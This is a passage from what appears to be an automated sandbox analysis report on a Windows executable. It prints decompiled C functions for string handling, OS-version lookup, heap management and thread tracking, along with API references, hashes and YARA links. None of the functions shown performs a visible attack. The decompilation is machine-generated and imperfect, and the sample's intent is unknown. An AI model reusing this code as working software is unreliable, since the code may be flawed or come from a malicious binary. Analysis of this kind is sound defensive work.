                                                                                                                                                                      • wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00416020,00000001,00000000), ref: 00405853
                                                                                                                                                                      • memmove.MSVCRT ref: 004058E1
                                                                                                                                                                      • wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memmovewcsncmpwcsncpy
                                                                                                                                                                      • String ID: $ A$$ A
                                                                                                                                                                      • API String ID: 1452150355-1089091023
                                                                                                                                                                      • Opcode ID: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
                                                                                                                                                                      • Instruction ID: ed4ff4c18a2212810426b4098d69787d901a9ef51c17c0146ffb5f4eacdccb4b
                                                                                                                                                                      • Opcode Fuzzy Hash: 01dc566c673ae38027766f4b1f49813a2af966d144f1d70881dd4b0cdd00eead
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F310636904B058BC720BB45888057B73A8EF84344F14893FEC85773C2EB789D61CBA9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405553, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 59%
                                                                                                                                                                      			E00405553(void* _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t5;
				signed int _t6;
				void* _t10;

				_t10 = _a4;
				memset(_t10, 0, 0x11c);
				 *_t10 = 0x11c;
				_t3 = GetModuleHandleW(L"ntdll.dll");
				if(_t3 == 0) {
					L3:
					return 0;
				}
				_t5 = GetProcAddress(_t3, "RtlGetVersion");
				if(_t5 == 0) {
					goto L3;
				}
				_t6 =  *_t5(_t10);
				asm("sbb eax, eax");
				return  ~_t6 + 1;
			}







                                                                                                                                                                      0x00405554
                                                                                                                                                                      0x00405562
                                                                                                                                                                      0x0040556a
                                                                                                                                                                      0x00405571
                                                                                                                                                                      0x00405579
                                                                                                                                                                      0x00405595
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405595
                                                                                                                                                                      0x00405581
                                                                                                                                                                      0x00405589
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040558c
                                                                                                                                                                      0x00405590
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 00405562
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressHandleModuleProcmemset
                                                                                                                                                                      • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                                                      • API String ID: 3137504439-1489217083
                                                                                                                                                                      • Opcode ID: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
                                                                                                                                                                      • Instruction ID: d7b210edb93dcdeb2ccead98f224fd87bedff0db37ff7f51e22340fec2856e60
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ebf752f119f1388f39407ae3350cfacb0de20c2e2bdd879fe172bcb8d336fbf
                                                                                                                                                                      • Instruction Fuzzy Hash: E0E0DF317606127AD6202B32AC09FCB2F9DDFCAB00B15043AB109F21C4E67CC5018ABD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409FE3, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 80memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                      			E00409FE3(void** _a4, wchar_t* _a8, intOrPtr _a12) {
				signed int _t35;
				wchar_t* _t41;
				wchar_t* _t50;
				void* _t57;
				void** _t58;
				signed int _t59;

				_t50 = _a8;
				_t58 = _a4;
				if(_a12 != 1) {
					L4:
					if(_t50 == 0) {
						_t50 = 0x412024;
					}
					_push(_t50);
					if((_t58[0xb] & 0x00000001) == 0) {
						_t35 = E0040A24F();
					} else {
						_t35 = E0040A26A();
					}
					_t59 = _t35 % _t58[9];
					_t57 = E0040D51F(_t58[0xe]);
					if(_t57 == 0) {
						L14:
						return _t57;
					} else {
						_t41 = HeapAlloc( *0x417008, 0, 2 + wcslen(_t50) * 2);
						 *(_t57 + 4) = _t41;
						wcscpy(_t41, _t50);
						 *_t57 =  *(_t58[1] + _t59 * 4);
						 *(_t58[1] + _t59 * 4) = _t57;
						_t58[2] = _t58[2] & 0x00000000;
						_t58[0xa] = _t58[0xa] + 1;
						 *_t58 = _t57;
						_t57 = _t57 + 8;
						_t58[5] = _t59;
						L11:
						if(_t57 != 0) {
							memset(_t57, 0, _t58[7]);
							if((_t58[0xb] & 0x00000002) != 0) {
								E00411B6F(_t57, _t58[4]);
							}
						}
						goto L14;
					}
				}
				_t57 = E00409F58(_t58, _t50);
				if(_t57 == 0) {
					goto L4;
				}
				if(_t58[4] != 0) {
					E00411A6A(_t48, _t57, _t58[4]);
				}
				goto L11;
			}









                                                                                                                                                                      0x00409fe9
                                                                                                                                                                      0x00409fef
                                                                                                                                                                      0x00409ff4
                                                                                                                                                                      0x0040a018
                                                                                                                                                                      0x0040a01a
                                                                                                                                                                      0x0040a01c
                                                                                                                                                                      0x0040a01c
                                                                                                                                                                      0x0040a025
                                                                                                                                                                      0x0040a026
                                                                                                                                                                      0x0040a02f
                                                                                                                                                                      0x0040a028
                                                                                                                                                                      0x0040a028
                                                                                                                                                                      0x0040a028
                                                                                                                                                                      0x0040a03d
                                                                                                                                                                      0x0040a044
                                                                                                                                                                      0x0040a048
                                                                                                                                                                      0x0040a0b1
                                                                                                                                                                      0x0040a0b7
                                                                                                                                                                      0x0040a04a
                                                                                                                                                                      0x0040a061
                                                                                                                                                                      0x0040a069
                                                                                                                                                                      0x0040a06c
                                                                                                                                                                      0x0040a079
                                                                                                                                                                      0x0040a07e
                                                                                                                                                                      0x0040a081
                                                                                                                                                                      0x0040a085
                                                                                                                                                                      0x0040a088
                                                                                                                                                                      0x0040a08a
                                                                                                                                                                      0x0040a08d
                                                                                                                                                                      0x0040a090
                                                                                                                                                                      0x0040a092
                                                                                                                                                                      0x0040a09a
                                                                                                                                                                      0x0040a0a6
                                                                                                                                                                      0x0040a0ac
                                                                                                                                                                      0x0040a0ac
                                                                                                                                                                      0x0040a0a6
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a092
                                                                                                                                                                      0x0040a048
                                                                                                                                                                      0x00409ffd
                                                                                                                                                                      0x0040a001
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a007
                                                                                                                                                                      0x0040a011
                                                                                                                                                                      0x0040a011
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A04B
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?,00403C62), ref: 0040A061
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A06C
                                                                                                                                                                      • memset.MSVCRT ref: 0040A09A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocHeapmemsetwcscpywcslen
                                                                                                                                                                      • String ID: $ A
                                                                                                                                                                      • API String ID: 1807340688-1415209610
                                                                                                                                                                      • Opcode ID: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
                                                                                                                                                                      • Instruction ID: 6837a03683538e1df5e2bdda5e350eaa22186be17e149c7482ea07580a24f61f
                                                                                                                                                                      • Opcode Fuzzy Hash: b573f2360bade24b46352e79e7494a938b3e836be09a0675c3f18950fe9764d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2F21F732400B04AFC331AF259881B67B7F5EF88318F14453FFA4562692D739A8148B1E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409D80, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 73memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00409D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _v0;
				void* _t25;
				void* _t31;
				void* _t34;
				signed int _t36;
				intOrPtr _t38;
				long _t39;
				intOrPtr _t41;
				void* _t42;

				_t41 = _a16;
				E00409E6F(_v0);
				_t34 = HeapAlloc( *0x417008, 0, 0x3c);
				if(_t34 != 0) {
					_t36 =  *(_t42 + 0x24);
					if(_t36 <= 0) {
						_t36 = 1;
					}
					_t25 = HeapAlloc( *0x417008, 8, _t36 << 2);
					 *(_t34 + 4) = _t25;
					if(_t25 == 0) {
						HeapFree( *0x417008, 0, _t34);
						_t34 = 0;
					} else {
						 *((intOrPtr*)(_t34 + 0x20)) = _a8;
						 *(_t34 + 0x24) = _t36;
						_t38 = _a4;
						 *_t34 = 0;
						 *((intOrPtr*)(_t34 + 0x1c)) = _t38;
						 *((intOrPtr*)(_t34 + 0x10)) =  *((intOrPtr*)(_t42 + 0x1c));
						 *((intOrPtr*)(_t34 + 0x28)) = 0;
						 *(_t34 + 0x2c) = 0;
						 *((intOrPtr*)(_t34 + 0x30)) = _t41;
						 *((intOrPtr*)(_t34 + 0x34)) = 0;
						if(E00411744( *((intOrPtr*)(_t42 + 0x1c))) != 0) {
							 *(_t34 + 0x2c) =  *(_t34 + 0x2c) | 0x00000002;
						}
						_t39 = _t38 + 8;
						 *((intOrPtr*)(_t34 + 0x38)) = E0040D7B9(_t39, 0x10, 0x10000, 4);
						_t31 = HeapAlloc( *0x417008, 8, _t39);
						 *(_t34 + 0xc) = _t31;
						 *((intOrPtr*)(_t31 + 4)) = 0x412024;
						_v0 = _t34;
					}
				}
				return _t34;
			}












                                                                                                                                                                      0x00409d82
                                                                                                                                                                      0x00409d8a
                                                                                                                                                                      0x00409da1
                                                                                                                                                                      0x00409da5
                                                                                                                                                                      0x00409dac
                                                                                                                                                                      0x00409db2
                                                                                                                                                                      0x00409db6
                                                                                                                                                                      0x00409db6
                                                                                                                                                                      0x00409dc5
                                                                                                                                                                      0x00409dc7
                                                                                                                                                                      0x00409dcc
                                                                                                                                                                      0x00409e3c
                                                                                                                                                                      0x00409e42
                                                                                                                                                                      0x00409dce
                                                                                                                                                                      0x00409dd4
                                                                                                                                                                      0x00409ddb
                                                                                                                                                                      0x00409dde
                                                                                                                                                                      0x00409de3
                                                                                                                                                                      0x00409de5
                                                                                                                                                                      0x00409de8
                                                                                                                                                                      0x00409deb
                                                                                                                                                                      0x00409dee
                                                                                                                                                                      0x00409df1
                                                                                                                                                                      0x00409df4
                                                                                                                                                                      0x00409dfe
                                                                                                                                                                      0x00409e00
                                                                                                                                                                      0x00409e00
                                                                                                                                                                      0x00409e0d
                                                                                                                                                                      0x00409e19
                                                                                                                                                                      0x00409e22
                                                                                                                                                                      0x00409e24
                                                                                                                                                                      0x00409e27
                                                                                                                                                                      0x00409e2e
                                                                                                                                                                      0x00409e2e
                                                                                                                                                                      0x00409e44
                                                                                                                                                                      0x00409e4a

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
                                                                                                                                                                        • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
                                                                                                                                                                        • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
                                                                                                                                                                        • Part of subcall function 00409E6F: HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409D9F
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DC5
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E22
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E3C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Free$Alloc
                                                                                                                                                                      • String ID: $ A
                                                                                                                                                                      • API String ID: 3901518246-1415209610
                                                                                                                                                                      • Opcode ID: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                                                                                                                      • Instruction ID: 0e5c90150bc367b96ffc2f2020c4fe6cd7e8dd6a87ef93d6b65d9b762928b75a
                                                                                                                                                                      • Opcode Fuzzy Hash: ccb60d0c3c0d97d686ede39e266302f74ea26cab0db78b650e52f4041141fcd5
                                                                                                                                                                      • Instruction Fuzzy Hash: 66216D71644711ABD3118F2ADD01B46BBE8FF48750F40812AB608E7691D770EC65CB98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405492, Relevance: 7.6, APIs: 5, Instructions: 60synchronizationthreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00405492(void* __ebx, _Unknown_base(*)()* _a4, void* _a8) {
				long _v4;
				long _t9;
				intOrPtr* _t11;
				void** _t16;
				intOrPtr* _t23;
				long _t25;
				void* _t26;

				_t25 = 0;
				_t26 = CreateThread(0, 0x1000, _a4, _a8, 0,  &_v4);
				if(_t26 != 0) {
					EnterCriticalSection(0x4176a0);
					_t23 =  *0x4170bc; // 0x0
					if(_t23 != 0) {
						do {
							_t4 = _t23 + 8; // 0x8
							_t16 = _t4;
							if(WaitForSingleObject( *_t16, _t25) != 0) {
								_t23 =  *_t23;
							} else {
								CloseHandle( *_t16);
								_t23 =  *_t23;
								E0040DAD2(0x4170bc, _t16);
							}
						} while (_t23 != 0);
					}
					_t9 =  *0x416110; // 0x1
					_t25 = _t9;
					 *0x416110 = _t9 + 1;
					_t11 = E0040DB12(0x4170bc, 0x10);
					 *_t11 = _t26;
					 *(_t11 + 4) = _t25;
					LeaveCriticalSection(0x4176a0);
				}
				return _t25;
			}










                                                                                                                                                                      0x00405499
                                                                                                                                                                      0x004054b1
                                                                                                                                                                      0x004054b5
                                                                                                                                                                      0x004054bd
                                                                                                                                                                      0x004054c3
                                                                                                                                                                      0x004054cb
                                                                                                                                                                      0x004054ce
                                                                                                                                                                      0x004054cf
                                                                                                                                                                      0x004054cf
                                                                                                                                                                      0x004054dc
                                                                                                                                                                      0x004054f7
                                                                                                                                                                      0x004054de
                                                                                                                                                                      0x004054e0
                                                                                                                                                                      0x004054e6
                                                                                                                                                                      0x004054ee
                                                                                                                                                                      0x004054f4
                                                                                                                                                                      0x004054f9
                                                                                                                                                                      0x004054fd
                                                                                                                                                                      0x004054fe
                                                                                                                                                                      0x00405503
                                                                                                                                                                      0x0040550d
                                                                                                                                                                      0x00405512
                                                                                                                                                                      0x0040551e
                                                                                                                                                                      0x00405520
                                                                                                                                                                      0x00405523
                                                                                                                                                                      0x00405529
                                                                                                                                                                      0x0040552f

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNEL32 ref: 004054AB
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                      • CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                        • Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004176A0,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$CloseCreateEnterFreeHandleHeapLeaveObjectSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3708593966-0
                                                                                                                                                                      • Opcode ID: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
                                                                                                                                                                      • Instruction ID: c80a9bd37122c97109a10f206962e584b77ac8964ddc4e7c45fa9607085a50ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 2d0ef3e9194763f319c037b8616fe7bccb25afd52532eb252bbef820a5610205
                                                                                                                                                                      • Instruction Fuzzy Hash: 1111A336204710BFC2115F59EC05E97BB69EB45762722802AF80197294EB75E9508F6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D8E6, Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040D8E6(void* __ebp, void* _a4) {
				int _t19;
				void _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t35;

				_t27 = _a4;
				_t26 =  *(_t27 + 8);
				if(_t26 == 0) {
					E0040D67D(_t27);
					if( *((intOrPtr*)(_t27 + 0x1c)) != 0) {
						_t14 = _t27 + 0x20; // 0x20
						DeleteCriticalSection(_t14);
					}
					return HeapFree( *0x417008, 0, _t27);
				}
				EnterCriticalSection(0x41761c);
				 *((intOrPtr*)( *(_t27 + 8) + 0x14)) =  *((intOrPtr*)( *(_t27 + 8) + 0x14)) - 1;
				_t19 =  *(_t27 + 8);
				if( *((intOrPtr*)(_t19 + 0x14)) <= 0) {
					 *(_t27 + 8) =  *(_t27 + 8) & 0x00000000;
					E0040D8E6(0x41761c, _t27);
					_t24 =  *_t26;
					if(_t24 != 0) {
						 *(_t24 + 4) =  *(_t26 + 4);
					}
					_t25 =  *(_t26 + 4);
					if(_t25 != 0) {
						 *_t25 =  *_t26;
					}
					_t35 =  *0x417618 - _t26; // 0x2460fa8
					if(_t35 == 0) {
						 *0x417618 =  *_t26;
					}
					_t19 = HeapFree( *0x417008, 0, _t26);
				}
				LeaveCriticalSection(0x41761c);
				return _t19;
			}









                                                                                                                                                                      0x0040d8e7
                                                                                                                                                                      0x0040d8ec
                                                                                                                                                                      0x0040d8f1
                                                                                                                                                                      0x0040d959
                                                                                                                                                                      0x0040d962
                                                                                                                                                                      0x0040d964
                                                                                                                                                                      0x0040d968
                                                                                                                                                                      0x0040d968
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d977
                                                                                                                                                                      0x0040d8fa
                                                                                                                                                                      0x0040d903
                                                                                                                                                                      0x0040d906
                                                                                                                                                                      0x0040d90d
                                                                                                                                                                      0x0040d90f
                                                                                                                                                                      0x0040d914
                                                                                                                                                                      0x0040d919
                                                                                                                                                                      0x0040d91d
                                                                                                                                                                      0x0040d922
                                                                                                                                                                      0x0040d922
                                                                                                                                                                      0x0040d925
                                                                                                                                                                      0x0040d92a
                                                                                                                                                                      0x0040d92e
                                                                                                                                                                      0x0040d92e
                                                                                                                                                                      0x0040d930
                                                                                                                                                                      0x0040d936
                                                                                                                                                                      0x0040d93a
                                                                                                                                                                      0x0040d93a
                                                                                                                                                                      0x0040d948
                                                                                                                                                                      0x0040d948
                                                                                                                                                                      0x0040d94f
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F
                                                                                                                                                                        • Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948
                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D968
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D977
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3171405041-0
                                                                                                                                                                      • Opcode ID: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                                                                                                                      • Instruction ID: 7b35f574515ae906377effd3f95b136c975bcdd302f3c0dc89a566dd6d791b35
                                                                                                                                                                      • Opcode Fuzzy Hash: 36284dfdec02e05f935528c2070bfad03c6b4f7cfd04ca417c4f9c2788c2e318
                                                                                                                                                                      • Instruction Fuzzy Hash: BB1158B5502601EFC320AF59EC08F97BBB5FF44311F11843AA44AA36A1C734E849CF98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409638, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                      			E00409638(void* __eflags, intOrPtr _a4) {
				int _t9;
				void* _t18;
				signed int _t19;

				_t18 = E0040E200(0x104, _a4);
				_t19 = GetModuleFileNameW( *0x41700c, _t18, 0x104);
				_t9 = wcscmp(_t18, L"\\\\?\\");
				_pop(_t17);
				if(_t9 == 0) {
					_t17 = _t19 * 2 - 8;
					_t4 = _t18 + 8; // 0x8
					memmove(_t18, _t4, _t19 * 2 - 8);
					_t19 = _t19 - 4;
				}
				E0040E350(_t17, 0x104 - _t19);
				 *((short*)(_t18 + _t19 * 2)) = 0;
				return 0;
			}






                                                                                                                                                                      0x0040964b
